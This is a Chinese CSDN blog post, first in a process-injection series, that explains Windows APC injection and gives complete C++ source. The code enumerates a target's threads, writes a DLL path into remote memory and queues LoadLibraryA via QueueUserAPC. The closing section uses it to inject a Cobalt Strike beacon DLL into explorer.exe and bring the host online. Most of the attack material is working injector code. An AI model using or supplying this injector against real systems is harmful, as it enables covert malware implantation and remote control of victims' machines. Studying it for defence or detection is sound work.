进程注入系列一之APC注入

于 2022-04-28 11:08:24 发布
阅读量3.4k 收藏 16
点赞数 1
分类专栏: 进程注入系列 文章标签: web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46539164/article/details/124469406
版权

什么是APC

APC 是一个简称,全称为Asynchronous Procedure Call,叫异步过程调用,是指函数在特定线程中被异步执行,在操作系统中,APC是一种并发机制。

MSDN解释为:

img

相关函数

QueueUserApc:函数作用,添加制定的异步函数调用(回调函数)到执行的线程的APC队列中

APCproc:函数作用: 回调函数的写法.

核心函数

QueueUserAPC

DWORD QueueUserAPC(
PAPCFUNCpfnAPC, // APC function
HANDLEhThread, // handle to thread
ULONG_PTRdwData // APC function parameter
);

参数1表示执行函数的地址,当开始执行该APC的时候,程序会跳转到该函数地址处来执行。

参数2表示插入APC的线程句柄,要求线程句柄必须包含THREAD_SET_CONTEXT 访问权限。

参数3表示传递给执行函数的参数,与远线程注入类似,如果QueueUserAPC 的第一个参数为LoadLibraryA,第三个参数设置的是dll路径即可完成dll注入。

实现原理

往线程APC队列添加APC,系统会产生一个软中断。在线程下一次被调度的时候,就会执行APC函数,APC有两种形式,由系统产生的APC称为内核模式APC,由应用程序产生的APC被称为用户模式APC

介绍一下应用程序的APC

APC是往线程中插入一个回调函数,但是用的APC调用这个回调函数是有条件的.在Msdn的写法如下

img

上面说到要要使用SleepEx,signalObjectAndWait…等等这些函数才会触发。

这就有了APC注入的条件:

1.必须是多线程环境下

2.注入的程序必须会调用上面的那些同步对象.

注入方法原理

1.当对面程序执行到某一个上面的等待函数的时候,系统会产生一个中断

2.当线程唤醒的时候,这个线程会优先去Apc队列中调用回调函数

3.我们利用QueueUserApc,往这个队列中插入一个回调

4.插入回调的时候,把插入的回调地址改为LoadLibrary,插入的参数我们使用VirtualAllocEx申请内存,并且写入进去

使用方法

1.利用快照枚举所有的线程

2.写入远程内存,写入的是Dll的路径

3.插入我们的DLL即可

实现过程

编写一个根据进程名获取pid的函数,然后根据PID获取所有的线程ID,这里我就将两个函数集合在一起,通过自己输入PID来获取指定进程的线程并写入数组

//列出指定进程的所有线程
BOOL GetProcessThreadList(DWORD th32ProcessID, DWORD** ppThreadIdList, LPDWORD pThreadIdListLength)
{
    // 申请空间
    DWORD dwThreadIdListLength = 0;
    DWORD dwThreadIdListMaxCount = 2000;
    LPDWORD pThreadIdList = NULL;
    HANDLE hThreadSnap = INVALID_HANDLE_VALUE;

    pThreadIdList = (LPDWORD)VirtualAlloc(NULL, dwThreadIdListMaxCount * sizeof(DWORD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pThreadIdList == NULL)
    {
        return FALSE;
    }

    RtlZeroMemory(pThreadIdList, dwThreadIdListMaxCount * sizeof(DWORD));

    THREADENTRY32 th32 = { 0 };

    // 拍摄快照
    hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, th32ProcessID);

    if (hThreadSnap == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }

    // 结构的大小
    th32.dwSize = sizeof(THREADENTRY32);

    // 遍历所有THREADENTRY32结构, 按顺序填入数组

    BOOL bRet = Thread32First(hThreadSnap, &th32);
    while (bRet)
    {
        if (th32.th32OwnerProcessID == th32ProcessID)
        {
            if (dwThreadIdListLength >= dwThreadIdListMaxCount)
            {
                break;
            }
            pThreadIdList[dwThreadIdListLength++] = th32.th32ThreadID;
        }
        bRet = Thread32Next(hThreadSnap, &th32);
    }

    *pThreadIdListLength = dwThreadIdListLength;
    *ppThreadIdList = pThreadIdList;

    return TRUE;
}

然后是apc注入的主函数,首先使用VirtualAllocEx远程申请内存

BOOL APCInject(HANDLE hProcess, CHAR* wzDllFullPath, LPDWORD pThreadIdList, DWORD dwThreadIdListLength)
{
	// 申请内存

	PVOID lpAddr = NULL;
	SIZE_T page_size = 4096;

	lpAddr = ::VirtualAllocEx(hProcess, nullptr, page_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	if (lpAddr == NULL)
	{
		ShowError("VirtualAllocEx - Error\n\n");
		VirtualFreeEx(hProcess, lpAddr, page_size, MEM_DECOMMIT);
		CloseHandle(hProcess);
		return FALSE;
	}
	// 把Dll的路径复制到内存中
	if (FALSE == ::WriteProcessMemory(hProcess, lpAddr, wzDllFullPath, (strlen(wzDllFullPath) + 1) * sizeof(wzDllFullPath), nullptr))
	{
		ShowError("WriteProcessMemory - Error\n\n");
		VirtualFreeEx(hProcess, lpAddr, page_size, MEM_DECOMMIT);
		CloseHandle(hProcess);
		return FALSE;
	}

	// 获得LoadLibraryA的地址
	PVOID loadLibraryAddress = ::GetProcAddress(::GetModuleHandle("kernel32.dll"), "LoadLibraryA");

	// 遍历线程, 插入APC
	float fail = 0;
	for (int i = dwThreadIdListLength - 1; i >= 0; i--)
	{
		// 打开线程
		HANDLE hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
		if (hThread)
		{
			// 插入APC
			if (!::QueueUserAPC((PAPCFUNC)loadLibraryAddress, hThread, (ULONG_PTR)lpAddr))
			{
				fail++;
			}
			// 关闭线程句柄
			::CloseHandle(hThread);
			hThread = NULL;
		}
	}

使用WriteProcessMemory把dll路径写入内存

::WriteProcessMemory(hProcess, lpAddr, wzDllFullPath, (strlen(wzDllFullPath) + 1) * sizeof(wzDllFullPath), nullptr)

获取LoadLibraryA的地址

PVOID loadLibraryAddress = ::GetProcAddress(::GetModuleHandle("kernel32.dll"), "LoadLibraryA");

便利线程并插入APC,这里定义一个fail并进行判断,如果QueueUserAPC返回的值为NULL则线程遍历失败,fail的值就+1

for (int i = dwThreadIdListLength - 1; i >= 0; i--)
    {
        // 打开线程
        HANDLE hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
        if (hThread)
        {
            // 插入APC
            if (!::QueueUserAPC((PAPCFUNC)loadLibraryAddress, hThread, (ULONG_PTR)lpAddr))
            {
                fail++;
            }
        }
    }

主函数,定义dll地址

strcpy_s(wzDllFullPath, "加载要注入的dll的路径");

使用OpenProcess打开句柄

HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ulProcessID);

调用前面写好的APCInject函数实现APC注入

if (!APCInject(hProcess, wzDllFullPath, pThreadIdList, dwThreadIdListLength))
    {
        printf("Failed to inject DLL\n");
        return FALSE;
    }

采用手动输入的方式,通过cin >> ulProcessID将接收到的参数赋给ulProcessID

image-20220225230246364

利用此方法上线CS

完整代码

// inject3.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
#include <iostream>
#include<Windows.h>
#include<TlHelp32.h>

using namespace std;

void ShowError(const char* pszText)
{
	char szError[MAX_PATH] = { 0 };
	::wsprintf(szError, "%s Error[%d]\n", pszText, ::GetLastError());
	::MessageBox(NULL, szError, "ERROR", MB_OK);
}


//列出指定进程的所有线程
BOOL GetProcessThreadList(DWORD th32ProcessID, DWORD** ppThreadIdList, LPDWORD pThreadIdListLength)
{
	// 申请空间
	DWORD dwThreadIdListLength = 0;
	DWORD dwThreadIdListMaxCount = 2000;
	LPDWORD pThreadIdList = NULL;
	HANDLE hThreadSnap = INVALID_HANDLE_VALUE;

	pThreadIdList = (LPDWORD)VirtualAlloc(NULL, dwThreadIdListMaxCount * sizeof(DWORD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (pThreadIdList == NULL)
	{
		return FALSE;
	}

	RtlZeroMemory(pThreadIdList, dwThreadIdListMaxCount * sizeof(DWORD));

	THREADENTRY32 th32 = { 0 };

	// 拍摄快照
	hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, th32ProcessID);

	if (hThreadSnap == INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}

	// 结构的大小
	th32.dwSize = sizeof(THREADENTRY32);

	//遍历所有THREADENTRY32结构, 按顺序填入数组

	BOOL bRet = Thread32First(hThreadSnap, &th32);
	while (bRet)
	{
		if (th32.th32OwnerProcessID == th32ProcessID)
		{
			if (dwThreadIdListLength >= dwThreadIdListMaxCount)
			{
				break;
			}
			pThreadIdList[dwThreadIdListLength++] = th32.th32ThreadID;
		}
		bRet = Thread32Next(hThreadSnap, &th32);
	}

	*pThreadIdListLength = dwThreadIdListLength;
	*ppThreadIdList = pThreadIdList;

	return TRUE;
}
BOOL APCInject(HANDLE hProcess, CHAR* wzDllFullPath, LPDWORD pThreadIdList, DWORD dwThreadIdListLength)
{
	// 申请内存

	PVOID lpAddr = NULL;
	SIZE_T page_size = 4096;

	lpAddr = ::VirtualAllocEx(hProcess, nullptr, page_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	if (lpAddr == NULL)
	{
		ShowError("VirtualAllocEx - Error\n\n");
		VirtualFreeEx(hProcess, lpAddr, page_size, MEM_DECOMMIT);
		CloseHandle(hProcess);
		return FALSE;
	}
	// 把Dll的路径复制到内存中
	if (FALSE == ::WriteProcessMemory(hProcess, lpAddr, wzDllFullPath, (strlen(wzDllFullPath) + 1) * sizeof(wzDllFullPath), nullptr))
	{
		ShowError("WriteProcessMemory - Error\n\n");
		VirtualFreeEx(hProcess, lpAddr, page_size, MEM_DECOMMIT);
		CloseHandle(hProcess);
		return FALSE;
	}

	// 获得LoadLibraryA的地址
	PVOID loadLibraryAddress = ::GetProcAddress(::GetModuleHandle("kernel32.dll"), "LoadLibraryA");

	// 遍历线程, 插入APC
	float fail = 0;
	for (int i = dwThreadIdListLength - 1; i >= 0; i--)
	{
		// 打开线程
		HANDLE hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
		if (hThread)
		{
			// 插入APC
			if (!::QueueUserAPC((PAPCFUNC)loadLibraryAddress, hThread, (ULONG_PTR)lpAddr))
			{
				fail++;
			}
			// 关闭线程句柄
			::CloseHandle(hThread);
			hThread = NULL;
		}
	}

	printf("Total Thread: %d\n", dwThreadIdListLength);
	printf("Total Failed: %d\n", (int)fail);

	if ((int)fail == 0 || dwThreadIdListLength / fail > 0.5)
	{
		printf("Success to Inject APC\n");
		return TRUE;
	}
	else
	{
		printf("Inject may be failed\n");
		return FALSE;
	}
}
int main()
{
	ULONG32 ulProcessID = 0;
	printf("Input the Process ID:");
	cin >> ulProcessID;
	CHAR wzDllFullPath[MAX_PATH] = { 0 };
	LPDWORD pThreadIdList = NULL;
	DWORD dwThreadIdListLength = 0;

#ifndef _WIN64
	strcpy_s(wzDllFullPath, "加载要注入的dll的路径");
#else // _WIN64
	strcpy_s(wzDllFullPath, "加载要注入的dll的路径");
#endif
	if (!GetProcessThreadList(ulProcessID, &pThreadIdList, &dwThreadIdListLength))
	{
		printf("Can not list the threads\n");
		exit(0);
	}
	//打开句柄
	HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ulProcessID);

	if (hProcess == NULL)
	{
		printf("Failed to open Process\n");
		return FALSE;
	}

	//注入
	if (!APCInject(hProcess, wzDllFullPath, pThreadIdList, dwThreadIdListLength))
	{
		printf("Failed to inject DLL\n");
		return FALSE;
	}
	return 0;
}

上线cs

首先CS建立监听,生成一个恶意dll文件

image-20220225230935262

在目标机上运行编译好的exe文件,并输入要注入进程的PID,这里我使用explorer.exe测试

image-20220226000549338

编译,输入PID

image-20220226000500412

查看CS,已经成功上线,且进程也加载了beacon.dll.

image-20220226000724483

image-20220226000738251

MCY5
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队内网攻防渗透:内网渗透之windows内网权限提升技术:服务启动&远程控制&进程启动&令牌窃取
HACKONE的博客
06-02 74
这里如果把shell注入到system的进程中就是system权限,但是中途如果要迁移shell到别的进程,需要看用户名权限,如果system迁移到administrator就是降权,如果administrator迁移到system就是提权。获取的权限是administrator,然后用一下所讲的技术进行提权和降权,如果是users的权限,以下技术是用不到的。这里是降权,选择权限是amdinistrator的权限进行注入,就会产生新的admin的权限shell回来。服务启动后上线的是system权限。
注入系列APC注入(Ring3)
weixin_43742894的博客
03-22 890
APC注入的作用:APC注入可以让一个线程在它正常的执行路径运行之前执行一些其他的代码。 要了解APC注入,我们首先来了解Windows的APC机制。 APC机制详细可参考本文:https://blog.csdn.net/qq229596421/article/details/77828647 简单来说,APC 是一个简称,具体名字叫做异步过程调用。是软件中断的一种。 APC队列:每个线程都有...
QueueUserAPC简介
lyx_2004的博客
10-11 1359
QueueUserAPC是一个简洁的工具,通常可以用作某些通过同步对象处理的任务的快捷方式。它允许您告诉特定线程在该线程方便的时候(即何时完成其当前工作并开始等待某件事)执行某项操作。 假设您有一个主线程和一个工作线程。辅助线程打开文件服务器的套接字,并通过循环调用recv()开始下载10GB文件。主线程希望在等待网络数据包时让工作线程在停机期间执行其他操作。它可以将要在工作程序上运行的功能排队,否则它将等待并且什么也不做。 您必须小心APC,因为在我提到的情况下,您不想进行另一个阻塞的WinSock调用(
APC_dll注入
qq_36918532的博客
03-03 435
主要是以下五步 //注入器 //1.要注入进程中首先要拿到进程ID //2.获取到LoadLibrary地址 //3.在目标程序的体内开辟一块内存,用来写入dll地址 //4.遍历线程-随便选一个目标进程的线程获取句柄 //5.插入APC,把LoadLibrary作为APC的回调参数,然后把目标进程的dll地址作为参数 #include<stdio.h> #include<stdlib.h> #include<Windows.h> #include<TlHelp3
APT视频教程
12-13
这套课程主要给大家讲解什么是APT,APT是如何攻击的,国外有哪些组织用一般用的什么手段,内容涉及到APT攻击模拟,样本分析,流量分析,特征提取。
APC 基本概念及APC注入的实现(Ring3 + Ring0)----实现
商少
07-21 2788
APC 基本概念及APC注入的实现(Ring3 + Ring0)—-实现Ring3 原理        利用QueueUserAPC 函数把APC添加到指定可警告线程的APC队列。 其中QueueUserAPC 函数及APC函数声明如下: DWORD WINAPI QueueUserAPC( _In_ PAPCFUNC pfnAPC, _In_ HANDLE
APC注入
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
10-30 616
/*********************************** desc : This code was written for inject a dll named text.dll to the target process based on APC. time : 2013 coder: ejoywx **********************
C++ APC注入.zip
08-06
C++ APC注入是一种高级的进程通信技术,常用于在Windows操作系统中实现远程线程注入。在本案例中,APC(Asynchronous Procedure Call)注入被用作替代方法,因为直接的DLL注入可能导致某些系统,如Win7,在特定情况...
APC注入测试源码C++
12-19
一个对APC注入进行学习测试的例子,可以在用户态下执行。但是对系统进程仍无法进行注入,不清楚是权限问题还是其他的问题。 工程在vs2012下编译测试成功。 共有三个工程 1、ApcInject 实现Apc注入功能 2、InjectTest...
易语言 注入源码 大全 远程线程注入 消息钩子注入 输入法注入 注册表注入 IAT永久注入 进程暂停注入 apc注入
11-20
APC注入利用此特性,在目标线程的上下文中执行注入的代码,通常用于实现跨线程操作或隐蔽的代码执行。 以上技术在合法的软件开发中,如调试、性能优化等场景中有应用,但它们也常常被恶意软件利用,因此在使用时需...
易语言移植的APC注入
07-22
APC注入的基本原理是通过系统调用,将一个函数(通常是一个DLL中的函数)添加到另一个线程的调度队列中,当该线程下次进入调度状态时,会执行这个函数。这种方式可以避免创建新线程或者进程,提高了效率。在Windows ...
Kernel_Inject:内核注入DLL
02-15
别问问就是F7 修仙交流(限定筑基期至渡劫期):546110133
创建进程挂起进程注入
02-08
下载请管理员帮忙修改下5分太多了。不会修改这个。 创建进程。挂起进程注入。然后可以做你想做的事情,比如修改不了PE头和各种恶心自检的文件。源码纯API,函数命令不提供了。想使用的自己添加一下,保证可以使用,希望大家自己动手添加函数命令这样记的更深刻。
易语言移植的APC注入源码
06-06
易语言移植的APC注入源码是一个涉及到Windows操作系统编程、进程通信和恶意代码技术的知识点。APC(Asynchronous Procedure Call)是Windows API提供的一种异步处理机制,常用于线程间的通信。在易语言中实现APC注入...
用户层注入:(4)APC注入
weixin_43972499的博客
03-14 400
目录理解APC机制关键函数注入过程参考代码 理解APC机制   以ReadFile函数为例,当我们在Ring3层调用该函数,会进一步调用Ntdll.dll的NtReadFile/ZwReadFile函数,然后函数进入内核层,调用Ntoskrnl.exe中的NtReadFile函数,这时,NtReadFile函数会创建一个IRP_MJ_READ类型的IRP,并将请求发送到对应的设备上,设备再根据IRP的类型调用对应的派遣函数。派遣函数在完成操作后,会调用IoCompleteRequest将IRP请求结束,并返
APC实现DLL注入
十年磨一剑,霜刃未曾试!
01-19 2545
#include #include int InjectDllWithApc(char DllFullPath[MAX_PATH], ULONG pid ) { HANDLE hProcess,hThread,hThreadSnap = INVALID_HANDLE_VALUE; THREADENTRY32 te32 = {0} ; HMODULE hDll = GetM
用 QueueUserAPC() 函数来强制线程退出等待状态
zicheng_lin的专栏
07-11 6767
当系统创建一个线程的时候,会同时创建一个与线程相关的队列。这个队列被成为异步过程调用(APC)队列。同时我们也知道,windows提供了6个函数可以等待并将线程设置为可提醒状态--------- SleepEx(),WaitForSingleObjectEx(),WaitForM
Windows异步过程调用(APC)
https://github.com/JelinYao
03-01 4391
原文转载自:http://blog.sina.com.cn/s/blog_6c617ee301017nhr.html,感谢原作者。 apc可以看成就是内核里的定时器,为了给自己一个在本函数返回后还能执行的一次机会,有很多操作是需要在函数返回后才能执行. 类似于析构函数但不完全是。 apc的最大特点就是在本函数返回后才执行,而且是在本线程中。 而内核提供的原生的定时器,执行的
windows apc注入原理
最新发布
06-11
Windows APC(Asynchronous Procedure Call)注入是一种常见的注入技术,它利用了 Windows 操作系统中的异步过程调用机制来实现注入。具体原理如下: 1. 创建目标进程 首先,攻击者需要创建一个目标进程,该进程将作为注入目标。一般情况下,攻击者会选择一个易受攻击的进程,例如 Windows Explorer。 2. 分配内存空间 攻击者需要在目标进程中分配一块内存空间,用于存放要注入的代码。可以使用 VirtualAllocEx 等函数来实现。 3. 编写注入代码 接下来,攻击者需要编写注入代码,并将其写入到之前分配的内存空间中。注入代码通常是一个 DLL 文件,其中包含了攻击者想要执行的恶意代码。同时,在注入代码中还需要将恶意代码的入口点指向一个 APC 回调函数。 4. 调用 QueueUserAPC 函数 接下来,攻击者需要在目标进程中的某个线程上调用 QueueUserAPC 函数,并将之前分配的内存空间中的 APC 回调函数作为参数。这样,当目标进程的线程下一次进入 Alertable 状态时,它将执行注入代码中的 APC 回调函数。 5. 触发注入 最后,攻击者需要触发目标进程中的线程进入 Alertable 状态。可以使用 Sleep、WaitForSingleObject 等函数来实现。 总之,APC 注入技术是一种高级的注入技术,攻击者可以通过它将恶意代码注入到目标进程中,并在其中执行。然而,这种技术也有一定的局限性,例如无法注入到特权级较高的进程中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值